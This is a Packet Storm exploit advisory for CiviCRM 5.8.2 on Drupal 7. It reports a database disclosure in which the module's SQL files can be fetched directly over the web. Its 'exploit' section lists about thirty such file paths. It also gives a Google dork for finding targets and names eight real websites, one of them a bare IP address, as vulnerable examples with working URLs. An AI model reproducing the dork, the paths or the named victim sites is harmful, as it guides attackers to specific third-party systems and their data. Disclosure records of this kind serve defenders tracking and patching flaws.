Drupal 7 CivicRM 5.8.2 Database Disclosure

2018-12-24T00:00:00
ID PACKETSTORM:150909
Type packetstorm
Reporter KingSkrupellos
Modified 2018-12-24T00:00:00

Description

                                        
                                            `#################################################################################################  
  
# Exploit Title : Drupal 7 CivicRM Modules 5.8.2 Database Disclosure  
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security  
Army  
# Date : 24/12/2018  
# Vendor Homepage : drupal.org - civicrm.org  
# Software Download Link : download.civicrm.org/civicrm-5.8.2-drupal.tar.gz  
+ drupal.org/project/civicrm  
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : Drupal V7.0 and 8.0 - CivicRM V5.8.2  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/sites/all/modules/civicrm/sql/''  
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access  
Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]  
  
#################################################################################################  
  
# Exploit :  
  
/sites/all/modules/civicrm/sql/case_sample.mysql  
  
/sites/all/modules/civicrm/sql/civicrm.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_acl.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_case_sql.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_data.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_demo_processor.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_devel_config.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_drop.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_dummy_processor.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_generated.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_generated_report.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_navigation.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_navigation.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_sample.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_sample_custom_data.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.1_v1.2_40.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.1_v1.2_41.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.2_v1.3_40.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.2_v1.3_41.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.3_v1.4_40.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.3_v1.4_41.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.4_v1.5_40.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.4_v1.5_41.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.5_v1.6_40.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.5_v1.6_41.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.6_v1.7_40.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.6_v1.7_41.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.7_v1.8_41.mysql  
  
/sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.8_v1.9_41.mysql  
  
#################################################################################################  
  
# Example Vulnerable Sites =>  
  
[+]  
eventos.icb.ufmg.br/sbc/sites/all/modules/civicrm/sql/civicrm_devel_config.mysql  
  
[+] odeon.dk/sites/all/modules/civicrm/sql/civicrm.mysql  
  
[+]  
everythingposture.com/stretchsit/sites/all/modules/civicrm/sql/civicrm_data.mysql  
  
[+]  
svn.ashlock.us/public/coop-members/sites/all/modules/civicrm/sql/civicrm_generated.mysql  
  
[+]  
old.stirlingswimming.co.uk/sites/all/modules/civicrm/sql/civicrm_drop.mysql  
  
[+] dev.serhouston.org/sites/all/modules/civicrm/sql/civicrm_generated.mysql  
  
[+] pnhp.org/sites/all/modules/civicrm/sql/civicrm_case_sql.mysql  
  
[+]  
66.39.116.79/sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.8_v1.9_41.mysql  
  
#################################################################################################  
  
# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security  
Team  
  
#################################################################################################  
`